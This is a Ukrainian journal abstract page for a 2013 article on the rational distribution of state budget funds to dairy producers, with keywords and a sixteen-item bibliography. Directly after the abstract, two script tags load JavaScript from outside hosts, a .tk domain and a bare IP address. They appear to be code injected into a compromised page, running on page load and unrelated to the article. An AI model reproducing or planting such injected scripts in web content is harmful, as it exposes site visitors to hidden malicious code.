ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.2:339.13
Сторінка молодого науковця

Шляхи раціонального розподілу бюджетних коштів для ефективного розвитку вітчизняних сільгоспвиробників / Школенко О. Б. // Економіка АПК. - 2013. - № 11 - С. 113

Досліджено стан і тенденції забезпечення фінансовими засобами підприємств молочної галузі. Проведений аналіз показав, що прийняття Податкового кодексу України змінило механізм дотування молочних виробників. Цей аспект негативно вплинув на розвиток вітчизняних товаровиробників. Державний механізм забезпечення фінансовими засобами є недосконалий і потребує перегляду. Адже надані кошти це ще не означає виплачені та раціонально використані на розвиток вітчизняних товаровиробників. Автором запропоновано економіко-математичну модель раціонального використання бюджетних коштів. При застосуванні даної моделі підприємства одержать максимальну прибутковість, а в подальшому - ефективний розвиток даної галузі. Табл.: 1. Рис.: 2. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: дотації, субсидії, підтримка, економічна модель, капіталовкладення, ПДВ, прибутковість

Список використаних джерел

 1. Аналітичний звіт «Молочна промисловість України. Річний огляд, 2011. «Дикун глобал консалт». –Умань. – 72 с.
 2. Аналітичний звіт щодо стану молочної галузі України та ефективності державного регулювання [Електронний ресурс] // Український клуб аграрного бізнесу. — К.: УКАБ, 2011. – 104 с. — Режим доступу: http://www.agribusiness.kiev.ua/img/zstored/files/analitics.
 3. Закон України «Про Державний бюджет України на 2011 рік» від 23.12.2010 № 2857-VI / [Електронний ресурс]. — Режим доступу : http://zakon4.rada.gov.ua/laws/show/2857-17.
 4. Ключові питання молочного сектору України та попередні рекомендації / Проект „ Виконання Україною зобов’язань щодо членства в СОТ і Європейської політики добросусідства у сільському секторі (секторальний підхід )” [Електронний ресурс]. — Режим доступу : http://www.swap-rural.org.ua
 5. Маслак А.М. Скотарство України : реалії сьогодення / А.М. Маслак // Агробізнес сьогодні . — 2012. — № 3 (226) . — С. 9–12.
 6. Нижче нікуди? Огляд ситуацій на ринку молока в Україні // Пропозиція [Електронна версія українського аграрного видання]. — Режим доступу : http://www.propozitsiya.com/?page= 149&itemid =1918 &number=59.
 7. Податковий кодекс України 2011р, ухвалений Верховною Радою України і підписаний Президентом України 02.12.2010 року за № 2755-VI // «Голос України», 2010, 4 груд. №229-230 (4979-4980) — 56 с.
 8. Постанова Кабінету Міністрів України № 246 від 2 березня 2011 року «Про затвердження Порядку використання сум податку на додану вартість, сплачених переробними підприємствами до спеціального фонду державного бюджету» [Електронний ресурс] // Режим доступу : http://zakon4.rada.gov.ua/laws/show/246-2011-%D0%BF.
 9. Саблук П.Т. Основні напрями удосконалення державної аграрної політики в Україні / П.Т. Саблук, Ю.Я. Лузан // Економіка АПК. — 2011. — № 5. — С. 3–16.
 10. Статистичний збірник «Сільське господарство України» за 2010 рік / за ред. Ю.М. Остапчука. — К.: Державна служба статистики України, 2011. — 374 с.
 11. Шигаєва Т.В. Шляхи реформування молокопереробної галузі України / Т.В. Шигаєва, О.Г Кулько // Зб. наук. праць «Науковий вісник академії муніципального управління» — Серія «Економіка» — вип. 7, 2009 р. [Електронний ресурс]. — Режим доступу : nbuv.gov.ua /portal/Soc_Gum/Nvamu_ekon/2009_7/ZMIST.htm.
 12. Berry P. (2009.) “Dairy”. Australian commodities, vol. 6, no1, p. 89–98.
 13. Dairy Management Inc., prepared for Innovation Center for U.S. Dairy, Executive Summary: The Future of Dairy, August 2012, pp 3 –9.
 14. Jerry Cessna (2013) “Situation and Outlook for the U.S. Dairy Industry” Agricultural Outlook Forum, February 22, p.1–6.
 15. Poppe K.J. (2008.) “Food legislation and competitiveness in the EU food industry”. Case studies in the dairy industry , p. 140.
 16. Spanu V., Virdis S., Scarano C., Cossu F., De Santis E. P. L. and Cosseddu A. M. (2010) .”Antibiotic resistance assessment in S. aureus strains isolated from raw sheep's milk cheese”. Veterinary Research Communications, p. 1–4.
Читати статтю: 13_11_113-118.pdf